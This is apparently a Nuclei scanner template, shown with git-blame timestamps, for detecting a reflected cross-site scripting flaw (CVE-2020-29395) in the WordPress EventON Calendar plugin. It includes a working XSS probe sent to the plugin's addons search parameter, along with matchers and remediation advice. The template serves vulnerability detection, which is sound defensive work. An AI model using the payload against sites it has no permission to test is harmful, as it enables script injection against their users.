2021-07-11 00:58:31 +00:00
|
|
|
id: CVE-2020-29395
|
|
|
|
|
|
|
|
info:
|
2022-08-16 14:14:41 +00:00
|
|
|
name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting
|
2021-07-11 00:58:31 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2022-08-16 14:14:41 +00:00
|
|
|
description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: |
|
|
|
|
Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-11 04:44:56 +00:00
|
|
|
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.myeventon.com/news/
|
2022-08-16 14:14:41 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
2023-04-12 10:55:48 +00:00
|
|
|
- http://packetstormsecurity.com/files/160282/WordPress-EventON-Calendar-3.0.5-Cross-Site-Scripting.html
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-29395
|
|
|
|
cwe-id: CWE-79
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.05489
|
|
|
|
epss-percentile: 0.92226
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: myeventon
|
|
|
|
product: eventon
|
2023-09-06 12:22:36 +00:00
|
|
|
framework: wordpress
|
2023-04-12 10:55:48 +00:00
|
|
|
tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm
|
2021-07-11 00:58:31 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-11 00:58:31 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2021-07-11 00:58:31 +00:00
|
|
|
words:
|
|
|
|
- "<svg/onload=alert(1)>"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|